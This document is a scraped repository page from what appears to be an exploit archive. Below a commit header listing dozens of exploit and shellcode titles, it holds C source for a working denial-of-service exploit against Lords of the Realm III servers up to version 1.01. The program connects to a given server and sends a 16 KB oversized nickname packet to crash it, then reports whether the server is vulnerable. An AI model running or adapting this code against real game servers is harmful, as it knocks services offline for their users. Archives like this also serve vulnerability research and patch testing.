880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
157 lines
No EOL
3.6 KiB
C
157 lines
No EOL
3.6 KiB
C
// source: https://www.securityfocus.com/bid/11223/info
|
|
|
|
A problem in the handling of nicknames is reported in the Lords of the Realm III server. Because of this, an attacker may be able to deny service to users of the game server.
|
|
|
|
The problem is in the handling of nicknames of excessive length.
|
|
|
|
It should be noted that this vulnerability only occurs when the server enters "lobby mode," which is a brief window of time before the initiation of a new game.
|
|
|
|
/*
|
|
|
|
by Luigi Auriemma
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
#ifdef WIN32
|
|
#include <winsock.h>
|
|
#include "winerr.h"
|
|
|
|
#define close closesocket
|
|
#else
|
|
#include <unistd.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <arpa/inet.h>
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
#endif
|
|
|
|
|
|
|
|
#define VER "0.1"
|
|
#define PORT 29901
|
|
#define BUFFSZ 16384 // BOOMSZ
|
|
|
|
#define SHOW(x) len = *(u_long *)p; \
|
|
fputs(x, stdout); \
|
|
p += 4; \
|
|
while(len--) { \
|
|
fputc(*p, stdout); \
|
|
p += 2; \
|
|
} \
|
|
fputc('\n', stdout);
|
|
|
|
|
|
|
|
u_long resolv(char *host);
|
|
void std_err(void);
|
|
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
struct sockaddr_in peer;
|
|
int sd,
|
|
len;
|
|
u_short port = PORT;
|
|
u_char buff[BUFFSZ],
|
|
*p;
|
|
|
|
|
|
setbuf(stdout, NULL);
|
|
|
|
fputs("\n"
|
|
"Lords of the Realm III <= 1.01 server crash "VER"\n"
|
|
"by Luigi Auriemma\n"
|
|
"e-mail: aluigi@altervista.org\n"
|
|
"web: http://aluigi.altervista.org\n"
|
|
"\n", stdout);
|
|
|
|
if(argc < 2) {
|
|
printf("\n"
|
|
"Usage: %s <server> [port(%d)]\n"
|
|
"\n", argv[0], PORT);
|
|
exit(1);
|
|
}
|
|
|
|
#ifdef WIN32
|
|
WSADATA wsadata;
|
|
WSAStartup(MAKEWORD(1,0), &wsadata);
|
|
#endif
|
|
|
|
if(argc > 2) port = atoi(argv[2]);
|
|
|
|
peer.sin_addr.s_addr = resolv(argv[1]);
|
|
peer.sin_port = htons(port);
|
|
peer.sin_family = AF_INET;
|
|
|
|
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
if(sd < 0) std_err();
|
|
|
|
printf("- target %s:%hu\n",
|
|
inet_ntoa(peer.sin_addr), port);
|
|
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
|
|
< 0) std_err();
|
|
|
|
if(recv(sd, buff, BUFFSZ, 0)
|
|
< 0) std_err();
|
|
|
|
fputs("- informations:\n", stdout);
|
|
if(*buff != 11) {
|
|
p = buff + 5;
|
|
SHOW(" Server*Admin: ");
|
|
p += 2;
|
|
SHOW(" Map: ");
|
|
} else {
|
|
p = buff + 24;
|
|
SHOW(" Admin nick: ");
|
|
}
|
|
|
|
*(u_long *)buff = BUFFSZ - 4;
|
|
memcpy(buff + 4, "\x79\xff\xff\xff\xff", 5);
|
|
*(u_long *)(buff + 9) = (BUFFSZ - 14) >> 1;
|
|
memset(buff + 13, 'a', BUFFSZ - 14);
|
|
buff[BUFFSZ - 1] = 0x45;
|
|
|
|
fputs("\n- send BOOM data\n", stdout);
|
|
if(send(sd, buff, BUFFSZ, 0)
|
|
< 0) std_err();
|
|
|
|
if(recv(sd, buff, BUFFSZ, 0) < 0) {
|
|
fputs("\nServer IS vulnerable!!!\n\n", stdout);
|
|
} else {
|
|
fputs("\nServer doesn't seem to be vulnerable\n\n", stdout);
|
|
}
|
|
|
|
close(sd);
|
|
return(0);
|
|
}
|
|
|
|
|
|
|
|
u_long resolv(char *host) {
|
|
struct hostent *hp;
|
|
u_long host_ip;
|
|
|
|
host_ip = inet_addr(host);
|
|
if(host_ip == INADDR_NONE) {
|
|
hp = gethostbyname(host);
|
|
if(!hp) {
|
|
printf("\nError: Unable to resolve hostname (%s)\n", host);
|
|
exit(1);
|
|
} else host_ip = *(u_long *)(hp->h_addr);
|
|
}
|
|
return(host_ip);
|
|
}
|
|
|
|
|
|
|
|
#ifndef WIN32
|
|
void std_err(void) {
|
|
perror("\nError");
|
|
exit(1);
|
|
}
|
|
#endif |